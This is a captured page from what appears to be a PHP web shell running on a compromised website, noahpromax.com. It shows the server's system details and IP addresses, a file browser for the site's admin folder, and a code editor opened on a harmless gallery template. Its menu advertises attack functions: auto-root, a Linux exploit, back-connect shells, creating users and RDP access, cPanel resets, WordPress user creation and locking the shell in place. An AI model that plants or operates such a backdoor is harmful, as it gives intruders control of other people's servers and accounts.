Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.72
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpromax.com /
assets /
admin /
php-version /
[ HOME SHELL ]
Name
Size
Permission
Action
blank.php
1.17
KB
-rw-r--r--
calendar.php
1.33
KB
-rw-r--r--
chart.php
7.2
KB
-rw-r--r--
config.php
47
B
-rw-r--r--
error.php
2.4
KB
-rw-r--r--
footer.php
4.7
KB
-rw-r--r--
form.php
11.75
KB
-rw-r--r--
gallery.php
2.13
KB
-rw-r--r--
grid.php
10.76
KB
-rw-r--r--
header.php
10
KB
-rw-r--r--
icon.php
20.47
KB
-rw-r--r--
index.php
21.74
KB
-rw-r--r--
login.php
1.76
KB
-rw-r--r--
table.php
51.03
KB
-rw-r--r--
tour.php
1.51
KB
-rw-r--r--
typography.php
10.22
KB
-rw-r--r--
ui.php
18.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gallery.php
<?php require('header.php'); ?> <div> <ul class="breadcrumb"> <li> <a href="#">Home</a> </li> <li> <a href="#">Gallery</a> </li> </ul> </div> <div class="row"> <div class="box col-md-12"> <div class="box-inner"> <div class="box-header well" data-original-title=""> <h2><i class="glyphicon glyphicon-picture"></i> Gallery</h2> <div class="box-icon"> <a href="#" class="btn btn-setting btn-round btn-default"><i class="glyphicon glyphicon-cog"></i></a> <a href="#" class="btn btn-minimize btn-round btn-default"><i class="glyphicon glyphicon-chevron-up"></i></a> <a href="#" class="btn btn-close btn-round btn-default"><i class="glyphicon glyphicon-remove"></i></a> </div> </div> <div class="box-content"> <br> <ul class="thumbnails gallery"> <?php for ($i = 1; $i <= 24; $i++) { ?> <li id="image-<?php echo $i ?>" class="thumbnail"> <a style="background:url(https://raw.githubusercontent.com/usmanhalalit/charisma/1.x/img/gallery/thumbs/<?php echo $i ?>.jpg)" title="Sample Image <?php echo $i ?>" href="https://raw.githubusercontent.com/usmanhalalit/charisma/1.x/img/gallery/<?php echo $i ?>.jpg"><img class="grayscale" src="https://raw.githubusercontent.com/usmanhalalit/charisma/1.x/img/gallery/thumbs/<?php echo $i ?>.jpg" alt="Sample Image <?php echo $i ?>"></a> </li> <?php } ?> </ul> </div> </div> </div> <!--/span--> </div><!--/row--> <?php require('footer.php'); ?>
Close